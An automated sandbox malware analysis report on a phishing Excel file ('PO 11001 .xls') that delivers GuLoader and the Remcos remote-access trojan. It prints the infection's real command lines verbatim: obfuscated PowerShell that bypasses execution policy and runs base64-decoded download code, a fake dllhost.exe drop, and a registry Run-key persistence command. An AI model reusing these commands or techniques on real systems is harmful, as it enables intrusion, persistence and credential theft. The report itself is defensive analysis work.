
Windows Analysis Report
PO 11001 .xls

Overview

General Information

Sample name:PO 11001 .xls
Analysis ID:1522508
MD5:c032108824b5b2e9075e6216300794ad
SHA1:f7517cdb21e84b14cc8b0a6bd7de1aa2d5804568
SHA256:eee751a9781787e72e2666b344b5262abac000f1abc8a090af60b574401e6b79
Tags: xls, user-abuse_ch

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3660 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3924 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 4008 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 4032 cmdline: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
            • powershell.exe (PID: 3388 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
              • Vaccinerende.exe (PID: 924 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • cmd.exe (PID: 1908 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: AD7B9C14083B52BC532FBA5948342B98)
                  • reg.exe (PID: 3084 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: D69A9ABBB0D795F21995C2F48C1EB560)
                • Vaccinerende.exe (PID: 4028 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 4008 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2192 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 3596 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2420 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2512 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 2992 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 3472 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1872 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 332 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1876 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1820 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam" MD5: 450228D72F9F726B645C55BBBC6DB905)
                • Vaccinerende.exe (PID: 1908 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr" MD5: 450228D72F9F726B645C55BBBC6DB905)
    • mshta.exe (PID: 1852 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1392 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2372 cmdline: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3584 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3424 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • dllhost.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Roaming\dllhost.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
            • powershell.exe (PID: 2596 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
              • Vaccinerende.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
  • powershell.exe (PID: 3852 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 1848 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • powershell.exe (PID: 1504 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3752 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000018.00000002.1008062874.0000000009B56000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000C.00000002.808389221.0000000009888000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: Vaccinerende.exe PID: 3116 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

          System Summary

          Source: File created | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3660, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].hta
          Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Roaming\dllhost.exe
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICA
          Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3660, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3924, ProcessName: mshta.exe
          Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dllhost.exe, NewProcessName: C:\Users\user\AppData\Roaming\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\dllhost.exe, ParentCommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4032, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , ProcessId: 3308, ProcessName: dllhost.exe
          Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3084, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Chivey57
          Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1908, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 3084, ProcessName: reg.exe
          Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4032, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", ProcessId: 3152, ProcessName: csc.exe
          Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 104.21.78.54, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3660, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
          Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ParentProcessId: 924, ParentProcessName: Vaccinerende.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 1908, ProcessName: cmd.exe
          Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3660, Protocol: tcp, SourceIp: 104.21.78.54, SourceIsIpv6: false, SourcePort: 443
          Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline
          Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3660, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'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'+[cHAR]0x22+'))')))", CommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; 